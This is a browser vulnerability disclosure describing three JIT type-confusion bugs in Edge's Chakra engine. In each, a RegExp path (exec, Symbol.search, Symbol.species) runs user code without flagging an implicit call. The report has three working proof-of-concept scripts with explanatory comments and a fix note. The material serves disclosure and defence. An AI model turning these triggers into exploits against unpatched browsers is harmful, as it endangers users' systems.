Microsoft Edge: Chakra: JIT: Multiple ImplicitCallFlags update bugs with RegExp
The same bug class with issue 1334 (MSRC-40170).

1. Calling RegExp.prototype.exec without updating the "ImplicitCallFlags" flag in "JavascriptRegExp::CallExec".

// PoC 1: String.prototype.match -> RegExp exec path.
// The hot function below is JIT-compiled during the warm-up loop in main(). The report's
// point is that the match() call can run user code (an overridden re.exec) without
// JavascriptRegExp::CallExec recording an implicit call, so the compiled code presumably
// keeps its earlier assumptions about arr across that call instead of bailing out.
function opt(arr, re) {
  arr[0] = 1.1; // arr holds doubles at this point; the final store is compiled on that basis
  'a'.match(re); // reaches re.exec — user-controlled once re.exec is replaced in main()
  arr[0] = 2.3023e-320; // raw double store; a denormal, presumably chosen so a type confusion is visible in the printed value
}
function main() {
  let arr = [1.1, 2.2, 3.3]; // float-element array (all doubles)
  let re = /a/;
  // Warm up: 0x2000 calls so opt() gets JIT-compiled with arr's element type specialized.
  for (let i = 0; i < 0x2000; i++) {
    opt(arr, re);
  }
  // Now make the exec call observable: it changes arr[0] to an object, i.e. arr's element
  // type changes inside the call that the JIT did not flag as an implicit call.
  re.exec = function () {
    arr[0] = {};
    return null;
  };
  opt(arr, re); // the store of 2.3023e-320 now runs under a stale assumption about arr
  print(arr[0]); // print() is the JS shell builtin (ch); not defined in Node/browsers
}
main();

2. Calling RegExp.prototype[Symbol.search] without updating the "ImplicitCallFlags" flag in "JavascriptString::CallRegExFunction".

// PoC 2: same shape as PoC 1, but the user code is reached through String.prototype.search,
// which dispatches to re[Symbol.search] via JavascriptString::CallRegExFunction.
function opt(arr, re) {
  arr[0] = 1.1;
  let r = 'a'.search(re); // r is intentionally unused; only the side effect of the call matters
  arr[0] = 2.3023e-320;
}
function main() {
  let arr = [1.1, 2.2, 3.3];
  let re = /a/;
  for (let i = 0; i < 0x2000; i++) {
    opt(arr, re); // warm-up, as in PoC 1
  }
  // Override the Symbol.search hook so the search() call mutates arr's element type.
  re[Symbol.search] = function () {
    arr[0] = {};
    return 0;
  };
  opt(arr, re);
  print(arr[0]);
}
main();

3. Calling Symbol.species without updating the "ImplicitCallFlags" flag in "RegexHelper::RegexEs6SplitImpl".

// PoC 3: same shape again; here the user code is the Symbol.species constructor that
// String.prototype.split looks up through re.constructor (RegexHelper::RegexEs6SplitImpl).
function opt(arr, re) {
  arr[0] = 1.1;
  'a'.split(re); // split() consults re.constructor[Symbol.species] — user code once replaced
  arr[0] = 2.3023e-320;
}
function main() {
  let arr = [1.1, 2.2, 3.3];
  let re = /a/;
  for (let i = 0; i < 0x2000; i++) {
    opt(arr, re); // warm-up, as in PoC 1
  }
  // Replace the constructor so the species lookup runs user code that changes arr[0].
  re.constructor = {
    [Symbol.species]: function () {
      arr[0] = {};
      return /a/;
    }
  };
  opt(arr, re);
  print(arr[0]);
}
main();

// Defender's summary (reviewer note): all three cases are the same defect — a RegExp-related
// builtin invokes user-overridable code without marking the implicit call, so JIT-compiled
// callers do not invalidate their type assumptions. The expected fix, per each item's title,
// is for CallExec, CallRegExFunction and RegexEs6SplitImpl to update ImplicitCallFlags on
// those paths; verify each PoC prints the object (not a number) after the fix.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Found by: lokihardt